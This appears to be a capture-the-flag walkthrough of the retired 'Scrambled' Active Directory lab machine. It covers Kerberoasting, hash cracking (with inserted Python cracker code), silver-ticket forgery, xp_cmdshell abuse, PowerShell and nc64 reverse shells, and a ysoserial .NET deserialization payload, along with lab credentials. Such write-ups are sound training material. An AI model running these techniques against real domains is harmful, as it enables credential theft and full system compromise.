Scrambled is a retired, intentionally vulnerable Windows machine. The goal is to obtain the user and root flags by exploiting its weaknesses.
We start by scanning the target with nmap.
Classic Scan
Full Port Scan
The port scan shows that we are facing an Active Directory domain controller; the names scrm.local, DC1.scrm.local and DC.scrm.local appear in the results. Enumerating ports 53, 135, 139, 389 and 445 at this stage yielded no useful information.
Next we enumerate port 80.
A browser technology analyzer (from developer mode) and a gobuster scan for hidden files and directories turned up nothing of value.
Browsing the site itself, the notable part is the IT Services section: it states that NTLM authentication has been disabled on the network.
We note that NTLM is off and continue.
In the Resources section we go through the pages in order:
Contacting IT support
Here we pick up the strings “0866”, “suport” and “ksimpson”; any of them could be a username or a password.
New User Account;
This page contains a form, but it does not work (we checked the requests with Burp Suite).
Report a problem with the sales orders app
This page says that if the application reports an error, the user should run its debug command; the debug output shows the client connecting to port 4411.
Request a password reset
This page says that when a password reset is requested, the password is reset to the username, so username and password are the same.
We have one username so far, so we use Kerberos pre-authentication (AS-REQ) user enumeration against the KDC to look for others: the DC answers differently for existing and non-existing accounts, and the technique does not depend on NTLM.
That turns up two users, and we then try each username as its own password in the same way.
ksimpson authenticates with the password ksimpson.
Because NTLM is disabled, most of the standard tooling fails: we could not connect to SMB with smbclient or crackmapexec.
We use Impacket's smbclient.py with Kerberos authentication (-k) instead:
smbclient.py -k scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip dc1.scrm.local
We connect successfully, but we only have access to the Public share.
Network Security Changes.pdf
We find this file, pull it to our machine with the get command and read it.
The PDF explains that NTLM was disabled because of an NTLM relay attack and that only Kerberos is used now. It also states that the HR department has access to the SQL database.
Since NTLM is off, we request a Ticket Granting Ticket (TGT) for ksimpson so that we can use Kerberos authentication with the other Impacket tools.
We obtain ksimpson.ccache with getTGT.py and point the tools at it through the KRB5CCNAME environment variable.
With a valid TGT we can ask the KDC (Key Distribution Center) for a service ticket (ST, also called a TGS) for any registered Service Principal Name (SPN). If the SPN belongs to a domain user account rather than a computer account, the service ticket is encrypted with a key derived from that user's password; with encryption type 23 (RC4-HMAC) that key is simply the account's NT hash, so the ticket can be cracked offline. This is Kerberoasting, and it only succeeds if the service account uses a weak password.
Obtaining SPN and ST/TGS
We request the tickets with the GetUserSPNs script, which looks up accounts that have SPNs and, with -request, asks the KDC for a ticket for each of them.
impacket-GetUserSPNs -request -dc-ip dc1.scrm.local scrm.local/ksimpson -k -no-pass
(Use the FQDN of the DC rather than its IP address: the Kerberos exchange needs the name to match the KDC, otherwise the script errors out.)
-k: authenticate with Kerberos, using the ticket in the ccache file named by KRB5CCNAME
-no-pass: do not prompt for a password
The command actually run, and its output:
GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -request -k
Impacket v0.10.1.dev1+20220720.103933.3c6713e – Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 16:32:02.351452  2022-09-27 20:50:47.384025
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 16:32:02.351452  2022-09-27 20:50:47.384025
[-] CCache file is not found. Skipping...
$krb5tgs$23$sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc$7d0427e0f264b8353b6d698a94ebbdd0$...
We have the ticket for sqlsvc. The "CCache file is not found" lines show that KRB5CCNAME was not exported, so the script fell back to the password given on the command line; that is fine here because the password is known.
We crack the hash with john.
The password is “Pegasus60”.
These credentials do not directly give us access to anything new. But sqlsvc is the account that runs the SQL service, and we now know its password, so we can forge a silver ticket: a service ticket that we encrypt ourselves with sqlsvc's key, claiming to be the domain Administrator. The SQL service validates the ticket with that same key and cannot tell that it was never issued by the KDC.
We need three things to forge a silver ticket for the SQL service:
1- the NT hash of the SqlSvc account's password
2- the domain SID
3- the SPN used by the SqlSvc account
Obtaining the NT hash is simple: it is the unsalted MD4 of the UTF-16LE encoded password, so a few lines of local code compute it (online hash tools also do it, but credentials from a real engagement should not be pasted into them).
B999A16500B87D17EC7F2E2A68778F05
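As an added example (not code from this writeup), the following Python reproduces both steps offline: the NT hash derivation just described, and the per-candidate check that john performs on a $krb5tgs$23$ hash like the one obtained above (RFC 4757 RC4-HMAC, key usage 2). The ticket body and the wordlist are constructed placeholders, and MD4 is implemented inline because hashlib often lacks it on OpenSSL 3 builds.

```python
"""Kerberoast check for etype 23 (RC4-HMAC) and NT hash derivation.

Added example, not code from the original writeup. The ticket body and the
wordlist below are constructed placeholders; a real service ticket carries an
ASN.1 EncTicketPart after the 8-byte confounder.
"""
from __future__ import annotations

import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib has no MD4 on many OpenSSL 3 builds."""
    f = lambda x, y, z: (x & y) | ((x ^ MASK32) & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    data = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        v = state[:]
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4  # target word rotates a, d, c, b as in the RFC tables
                mixed = v[t] + fn(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]) + x[k] + const
                v[t] = _rotl(mixed & MASK32, shifts[i % 4])
        state = [(s + w) & MASK32 for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash: unsalted MD4 over the UTF-16LE password (what ticketer.py -nthash expects)."""
    return md4(password.encode("utf-16le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 section 7.5.1: enc-part of a service ticket


def _k1(nt: bytes) -> bytes:
    # RFC 4757: Ki = HMAC-MD5(K, key usage as 32-bit little endian)
    return hmac.new(nt, struct.pack("<I", KEY_USAGE_TGS_REP_TICKET), hashlib.md5).digest()


def rc4_hmac_encrypt(nt: bytes, plaintext: bytes) -> tuple[bytes, bytes]:
    """RFC 4757: checksum = HMAC(K1, plaintext); ciphertext = RC4(HMAC(K1, checksum), plaintext)."""
    k1 = _k1(nt)
    checksum = hmac.new(k1, plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, plaintext)


def format_krb5tgs(user: str, realm: str, spn: str, checksum: bytes, edata: bytes) -> str:
    """Same layout GetUserSPNs.py prints (hashcat 13100 / john krb5tgs)."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def check_password(krb5tgs: str, candidate: str) -> bool:
    """One cracking step: derive K1 from the candidate, decrypt, recompute the HMAC."""
    parts = krb5tgs.split("$")
    if parts[1] != "krb5tgs" or parts[2] != "23":
        raise ValueError("only etype 23 (RC4-HMAC) is handled here; AES tickets use PBKDF2-derived keys")
    checksum, edata = bytes.fromhex(parts[-2]), bytes.fromhex(parts[-1])
    k1 = _k1(nt_hash(candidate))
    plaintext = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), edata)
    return hmac.compare_digest(hmac.new(k1, plaintext, hashlib.md5).digest(), checksum)


def crack(krb5tgs: str, wordlist) -> str | None:
    return next((w for w in wordlist if check_password(krb5tgs, w)), None)


# Constructed sample: 8-byte confounder + placeholder body, encrypted under Pegasus60's NT hash.
_CONFOUNDER = bytes(range(8))
_BODY = b"\x79\x82\x03\xff" + b"EncTicketPart placeholder " * 8
SAMPLE_CHECKSUM, SAMPLE_EDATA = rc4_hmac_encrypt(nt_hash("Pegasus60"), _CONFOUNDER + _BODY)
SAMPLE_HASH = format_krb5tgs("sqlsvc", "SCRM.LOCAL", "scrm.local/sqlsvc", SAMPLE_CHECKSUM, SAMPLE_EDATA)
WORDLIST = ["password", "Pegasus59", "ScrambledEggs", "Pegasus60", "Pegasus61"]  # constructed

if __name__ == "__main__":
    print("NT hash of Pegasus60:", nt_hash("Pegasus60").hex())
    print("cracked:", crack(SAMPLE_HASH, WORDLIST))
```

The check is cheap per candidate (one MD4 and three HMAC-MD5), which is exactly why RC4 tickets crack so fast and why the fix on the defensive side is long service-account passwords (or gMSAs) and AES-only service accounts.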
We use Impacket's getPac.py to obtain the domain SID (it is also the prefix of every user's SID, minus the trailing RID).
Domain SID: S-1-5-21-2743207045-1827831105-2542523200
The remaining item, the SPN, was already shown by GetUserSPNs.py:
MSSQLSvc/dc1.scrm.local:1433
Now we create the silver ticket with ticketer.py, giving it the NT hash, the domain SID, the domain, the SPN and the name of the user to impersonate (Administrator). It writes a ccache that we again export as KRB5CCNAME.
The ticket is created.
Let's try to connect to SQL using this ticket, with mssqlclient.py and Kerberos authentication.
The connection succeeds, so we enumerate the databases.
Among the tables we find the credentials of the MiscSvc user.
Let's see if we can enable xp_cmdshell; as the impersonated Administrator we have enough rights on the instance for sp_configure.
After enabling it,
we can run operating system commands, so we use PowerShell to fetch and execute a reverse shell.
We have our shell.
This shell runs as scrm\sqlsvc and is very limited.
We cannot get anywhere with it and find no useful files. Since we know the MiscSvc credentials, we will switch to that user.
First we build a credential object:
$pswd = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $pswd)
Then we use Invoke-Command with this $cred to start a second reverse shell as MiscSvc
(the reverse shell one-liner comes from https://www.revshells.com/):
Invoke-Command -ComputerName dc1 -ScriptBlock { powershell -enc ... } -Credential $cred
Note that the -Credential $cred argument goes at the end of the command, after the script block.
We listen on a different terminal.
We now have a shell as scrm\miscsvc and can read the user flag on the Desktop.
With the user flag in hand we can see the Administrator folder but cannot read its files.
So we enumerate the host locally.
Two interesting files sit in “C:\Shares\IT\Apps\Sales Order Client\”.
We want them on our machine for closer analysis.
Transferring them from the shell did not work, whatever we tried, so we fetch them over SMB with Impacket's smbclient.py instead.
The files are now local.
We analyse them with dnSpy.
The source shows that when the username is scrmdev, the application skips credential validation entirely, and that the client talks to the server on port 4411.
Let's look at port 4411.
The service expects a command. A couple of guesses got us nowhere.
Reading the source a little further,
we find commands such as LIST_ORDERS and UPLOAD_ORDER, and we use that syntax on the port.
LIST_ORDERS
The output looks like base64. Decoding it gave nothing readable at the time.
UPLOAD_ORDER
The server expects us to supply something.
Since the client is a .NET application, the uploaded order is most likely a serialized .NET object, which means the server deserializes untrusted data; a Google search for how to abuse that
leads to the ysoserial.net tool (ysoserial.exe), which generates .NET deserialization payloads.
After a little reading on its usage:
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c “command”
-f selects the formatter, -g the gadget chain, -o base64 matches what the service expects and -c is the command to run; we use it to have nc64.exe give us a reverse shell.
The command runs and prints the base64 payload.
We send that payload as the UPLOAD_ORDER argument to port 4411 while listening on our machine.
The server deserializes it, and we get a shell as SYSTEM.
That is how we obtain the root flag.